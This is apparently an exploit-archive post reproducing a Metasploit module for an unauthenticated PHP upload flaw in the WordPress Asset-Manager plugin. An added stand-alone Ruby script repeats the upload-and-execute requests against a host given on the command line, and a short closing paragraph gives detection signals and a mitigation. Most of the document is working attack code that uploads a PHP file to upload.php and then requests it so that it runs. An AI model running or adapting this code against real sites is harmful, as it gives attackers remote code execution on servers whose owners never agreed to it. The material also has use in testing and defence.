WordPress Asset-Manager PHP File Upload Vulnerability

Posted 2012-12-31 09:22:33
This module, from the Metasploit exploit library, targets a vulnerability found in the WordPress Asset-Manager plugin version 2.0 and below. It allows PHP files to be uploaded: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    # Random .php file name; the payload deletes itself once it has run
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Single multipart part named "Filedata", the field upload.php reads
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    # Step 1: unauthenticated upload through the plugin's upload.php
    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # The handler echoes the stored file name on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Step 2: request the file from the temp directory so PHP executes it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
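The two-request exchange the module above drives (unauthenticated multipart POST of a `Filedata` part to the plugin's `upload.php`, then a GET of the stored file from `wp-content/uploads/assets/temp/`) as a stand-alone Ruby script with no Metasploit dependency. This is an added example, not code from the original post or from the Metasploit module: the host, port and base path are supplied by the caller, the self-deleting marker file stands in for the module's `get_write_exec_payload`, and the sample responses used to check the helpers are constructed. Nothing is contacted unless a host is given on the command line.

```ruby
# Added example (not part of the original post or of the Metasploit module):
# stand-alone reproduction of the upload-then-execute exchange, with the
# request construction and success checks kept as pure functions so they
# can be exercised offline against constructed responses.
require 'securerandom'
require 'net/http'

UPLOAD_PATH = 'wp-content/plugins/asset-manager/upload.php'  # handler named in the module
TEMP_DIR    = 'wp-content/uploads/assets/temp/'              # where the module fetches the file back

# Ensure the WordPress base path ends with '/', as the module does with target_uri.path.
def normalize_base(base)
  base.end_with?('/') ? base : "#{base}/"
end

# Same shape as the module's rand_text_alpha(5) + ".php".
def random_php_name
  "#{Array.new(5) { ('a'..'z').to_a.sample }.join}.php"
end

# Self-deleting marker file standing in for the module's payload (assumption: the
# marker string is chosen by the caller and only has to be unique per run).
def probe_php(marker)
  "<?php echo '#{marker}'; @unlink(__FILE__); ?>"
end

# Build a multipart/form-data body with the single 'Filedata' part upload.php reads.
# Returns [boundary, body].
def build_multipart(filename, content)
  boundary = "----ruby-#{SecureRandom.hex(12)}"
  parts = [
    "--#{boundary}",
    "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{filename}\"",
    'Content-Type: application/octet-stream',
    '',
    content,
    "--#{boundary}--",
    ''
  ]
  [boundary, parts.join("\r\n")]
end

# The module counts the upload as successful only on HTTP 200 with the file
# name echoed in the response body.
def upload_ok?(status, body, filename)
  status == 200 && body.to_s.include?(filename)
end

# Path at which the stored file is fetched (and therefore run by PHP).
def executed_path(base, filename)
  "#{normalize_base(base)}#{TEMP_DIR}#{filename}"
end

# Execution is confirmed only when the GET returns 200 and the body carries the
# marker. A 200 that serves the PHP source back verbatim (body still contains
# "<?php") means the file was stored but not interpreted, which the module's
# status-only check would misreport as success.
def execution_result(status, body, marker)
  return :execution_failed unless status == 200
  text = body.to_s
  return :not_executed if text.include?('<?php')
  text.include?(marker) ? :vulnerable : :not_executed
end

# Live check against a host you are authorised to test. Returns an outcome symbol.
def run_check(host, port, base, ssl: false)
  filename = random_php_name
  marker   = SecureRandom.hex(8)
  boundary, body = build_multipart(filename, probe_php(marker))

  http = Net::HTTP.new(host, port)
  http.use_ssl = ssl
  post = Net::HTTP::Post.new("#{normalize_base(base)}#{UPLOAD_PATH}")
  post['Content-Type'] = "multipart/form-data; boundary=#{boundary}"
  post.body = body
  up = http.request(post)
  return :upload_failed unless upload_ok?(up.code.to_i, up.body, filename)

  get = http.get(executed_path(base, filename))
  execution_result(get.code.to_i, get.body, marker)
end

# Usage: ruby asset_manager_check.rb <host> [/wordpress-base-path]
if __FILE__ == $0 && !ARGV.empty?
  host = ARGV[0]
  base = ARGV.fetch(1, '/wordpress')
  puts run_check(host, 80, base)
end
```

From the defender's side the same two requests are the signal: a POST to `wp-content/plugins/asset-manager/upload.php` carrying a multipart part named `Filedata` whose filename ends in `.php`, with no WordPress session cookie, followed shortly by a GET for a `.php` file under `wp-content/uploads/assets/temp/`. Serving that directory with PHP execution disabled turns the second request into the `:not_executed` case above.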